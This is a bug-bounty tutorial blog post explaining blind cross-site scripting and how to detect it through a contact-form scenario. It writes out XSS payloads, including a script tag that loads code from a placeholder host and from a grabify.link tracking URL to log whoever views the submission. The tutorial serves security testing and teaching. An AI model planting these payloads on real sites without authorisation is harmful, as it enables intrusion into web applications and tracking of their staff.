Bug Bounty: Blind XSS Payloads Explained

4 min readJul 18, 2022

This article was originally posted on bepractical.tech

INTRODUCTION

Hi everyone! In this article, you will learn about how to craft blind xss payloads to get yourself bounties. Before we dive deep in this article, let us first learn about some few things:

What is XSS(Cross Site Scripting)?

In simple terms, It is a vulnerability that allows any attacker to embed their own javascript code in the web application. Using JavaScript, The attacker can basically control the whole webpage’s structure of the application. In the worse scenario, they can steal someone’s cookies to access their account without credentials or hack the client’s device! Read more about it here.

What is Blind XSS?

A/Q Acunetix, “Blind XSS vulnerabilities are a variant of persistent XSS vulnerabilities. They occur when the attacker input is saved by the web server and executed as a malicious script in another part of the application or in another application”

In other variants of XSS, we can see the reflected input in the response. However, this is not the case in the blind XSS. Therefore, we need a different approach in order to find this blind xss.

You can learn more about finding xss vulnerability over here

A Simple Blind XSS Scenario:

Let’s say there is a website contactme.com. The website contains a contact us page. There we have a form with three fields Name, Email Address and Phone Number. On submitting the form, we see a message “Thank you for contacting us. We will be in touch with you within 24 hrs”. After that, someone from the company logs into their account and sees your details. Using the details, they contact you for further assistance.

Now in this case, no matter what we are providing in the form the only response we will get from the backend is “Thank you for contacting us. We will be in touch with you within 24 hrs”. So here, we cannot use our old payloads to verify the vulnerability. Instead, we need to craft a different payload. Let’s see how we can do that.

CRAFTING PAYLOAD FOR BLIND XSS

Let’s try to create a very simple payload for xss i.e <script>alert(1)</script>. We all know that it will pop an alert once get rendered. But in blind xss, we won’t be able to see the popup. So, we need to think of a payload which we can use to see the output of the response body.

In this article, we are going to use the payload below:

<script src=”your_website.com”></script>

This payload simply tries to load the javascript file from your_website.com. If the payload then gets executed, then we will be able to see the request on our website. This is one of the common method to detect a blind xss.

BLIND XSS WITH GRABIFY

Now, let us try to craft a payload with grabify. Follow the steps below:

1- Open Grabify.

2- Type any url here(google.com) and click on “Create URL”.

3- After that, you will see a screen similar to this:

4- Now, Copy the link of “New URL” and paste it inside your payload: <script src=”https://grabify.link/9P0OX8″></script> and use this in the vulnerable web application. If the website is vulnerable, you will see something like below:

Now if we use this payload in the example above, we can successfully achieve blind xss if vulnerable. It is because once someone from the company try to see your details. The xss payload will be executed and you will see the data as shown in the picture.